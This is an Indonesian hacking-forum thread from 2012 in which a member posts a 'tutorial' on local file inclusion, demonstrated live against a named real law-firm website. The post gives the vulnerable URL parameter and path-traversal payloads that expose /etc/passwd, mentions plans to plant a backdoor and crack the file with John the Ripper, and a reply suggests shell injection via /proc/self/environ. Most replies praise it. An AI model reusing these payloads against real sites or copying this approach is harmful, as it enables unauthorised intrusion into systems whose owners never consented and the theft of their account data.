+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Lain-lain (https://www.indonesianbacktrack.or.id/forum/forum-125.html)
+---- Thread: Share LFI TutoriaL [special 4 peserta training 20 maret 2012] (/thread-2105.html)
Pages:
1
2
LFI TutoriaL [special 4 peserta training 20 maret 2012] - koecroet - 03-21-2012
setelah lama gk bikin tread ane malam ini mau bikin tread atas nama penasaran dan kesalahan ane karna ada yg menanyakan apakah website ini vulnerable atau tidak. dan ternyata ada dan ane sudah sampai di /etc/passwd walau belum sempat untuk menanam backdoor dikarenakan di butuhkan perabaan file lagi dan besok hari ane UAS fisika dan Ipa wkwkwkwk
oke deh ane lupa tadi yg nannya om siapa yg jelas ini special untuk ente
Code:
bug nya terletak disini:
http://www.rechtsanwalt-bohle.de/index.php?tarcont=Code:
kalo dikasih
http://www.rechtsanwalt-bohle.de/index.php?tarcont=./../../../../../etc/passwdmuncul error kan??
, tapi belom muncul isi file dari /etc/passwd. eits sebelum itu jangan2 ada yg belom tau lagi macem isi dari /etc/passwd gimana . coba buka dulu di backtrack ente, Code:
cat /etc/passwditu akan muncul isi dari file /etc/passwd yang nantinya bisa di crack dengan JTR bin John The Ripper
okeh lanjut error tersebut bisa dikatakan bug terdapat, tapi belom ketemu /etc/passwd nya, hmm sekarang coba kita mundur dengan
Code:
../../../coba kita langsung ke /etc/passwd
Code:
www.rechtsanwalt-bohle.de/index.php?tarcont=/etc/passwdtada!!
muncul deh isi /etc/passwd walaupun harus di exploit lanjut buat tanam shell nya.
disini ane hanya menunjukan ke peserta training tadi kalo web ini ada bug lfi nya
thank u
Quote:curcol dikit, ane lagi keingetan mantan :|
mohon maaf kalo tutorial nya cupu abis, apa lagi buat yg udah dewi bin dewo banget *sungkem* *tendang* *kaburr*
ane masih jauh dari kata pentester apa lagi hacker,
salam..
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - zee eichel - 03-21-2012
yup sayangnya sudah jarang bug2 seperti itu .. sudah old bug .. tapi gk apa2 ini bahan pembelajaran
nice share
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - koecroet - 03-21-2012
iya om udah jrang banget bug kaya gini, td ada yg nannya aja
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - iKONspirasi - 03-21-2012
nice buat belajar nih, +1 dari ane biar semangat
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - sasaka - 03-21-2012
ini mana poc nya??
etc passwd kan cuma dapet user doang,,, ckckkck
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - koecroet - 03-21-2012
tujuan ane cuma smpe nampilin /etc/passwd doank
. tp kan bisa di cari lagi "/proc/self/environ" kalo bisa di akses kan tinggal di selipin shell salah naro di VIP tadi hhe
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - ekawithoutyou - 03-21-2012
wah boleh juga... ni ahahahahah
makanya tadi waktu cari ga ada taunya di masukan VIP forum
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - Divha - 03-21-2012
wiih , mantap bang buat pembelajaran
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - permana - 03-26-2012
mantap pak dhe . . tapi ndak tahu tanam shellnya
RE: LFI TutoriaL [special 4 peserta training 20 maret 2012] - xCode - 09-29-2012
om,ini kalo dari segi web programmingnya atau dari segi setting servernya gimana biar g bisa kena lfi?
buat antisipasi gitu